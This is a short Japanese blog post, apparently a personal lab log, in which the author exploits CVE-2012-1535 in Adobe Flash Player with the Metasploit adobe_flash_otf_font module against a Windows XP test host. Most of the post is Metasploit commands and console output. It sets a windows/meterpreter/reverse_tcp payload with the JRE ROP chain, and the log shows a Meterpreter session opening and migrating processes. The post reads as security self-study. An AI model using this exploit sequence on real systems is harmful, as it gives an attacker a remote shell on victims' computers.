脆弱性の詳細は下記のリンク。
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1535
Metasploit の情報は下記のリンク。
http://www.metasploit.com/modules/exploit/windows/browser/adobe_flash_otf_font
windows xp には flashplayer11_2r202_228_winax_32bit.exe をインストールして、Metasoloit で下記のように実行したところ、まずは失敗。
msf > use exploit/windows/browser/adobe_flash_otf_font
msf exploit(adobe_flash_otf_font) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.80:4444
[*] SWF Loaded: 31941 bytes
[*] Using URL: http://0.0.0.0:8080/X8CVKazCkgdN5X
msf exploit(adobe_flash_otf_font) > [*] Local IP: http://172.16.0.80:8080/X8CVKazCkgdN5X
[*] Server started.
msf exploit(adobe_flash_otf_font) >
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /X8CVKazCkgdN5X
[*] 172.16.0.100 adobe_flash_otf_font - Sending HTML
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /X8CVKazCkgdN5X5euz.swf
[*] 172.16.0.100 adobe_flash_otf_font - Sending SWF
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /pay.txt
[*] 172.16.0.100 adobe_flash_otf_font - Sending Payload
msf exploit(adobe_flash_otf_font) >
Metasploit のブログに「Windows XP なら ROP chain のオプションを JRE にしてもいいぜ!!」的なことが書いてあったので、試してみると成功した。
https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit
msf > use exploit/windows/browser/adobe_flash_otf_fontメモリの状態とかまでは確認してないないので、詳細は分からないがとりあえず何も考えずに Windows で試すなら JRE を使用したほうが成功する。
msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_otf_font) > set srvhost 172.16.0.80
srvhost => 172.16.0.80
msf exploit(adobe_flash_otf_font) > set srvport 80
srvport => 80
msf exploit(adobe_flash_otf_font) > set lhost 172.16.0.80
lhost => 172.16.0.80
msf exploit(adobe_flash_otf_font) > set lport 8080
lport => 8080
msf exploit(adobe_flash_otf_font) > set uripath test
uripath => test
msf exploit(adobe_flash_otf_font) > set ROP JRE
ROP => JRE
msf exploit(adobe_flash_otf_font) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.80:8080
[*] SWF Loaded: 31941 bytes
[*] Using URL: http://172.16.0.80:80/test
[*] Server started.
msf exploit(adobe_flash_otf_font) > [*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /test
[*] 172.16.0.100 adobe_flash_otf_font - Sending HTML
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /test6QWwOQw.swf
[*] 172.16.0.100 adobe_flash_otf_font - Sending SWF
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /pay.txt
[*] 172.16.0.100 adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 172.16.0.100
[*] Meterpreter session 1 opened (172.16.0.80:8080 -> 172.16.0.100:1052) at 2012-08-20 22:34:05 +0900
[*] Session ID 1 (172.16.0.80:8080 -> 172.16.0.100:1052) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (184)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 128
[+] Successfully migrated to process
msf exploit(adobe_flash_otf_font) >
msf exploit(adobe_flash_otf_font) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 HOGEHOGE\hogehoge @ HOGEHOGE-71815D 172.16.0.80:8080 -> 172.16.0.100:1052 (172.16.0.100)
msf exploit(adobe_flash_otf_font) >
0 件のコメント:
コメントを投稿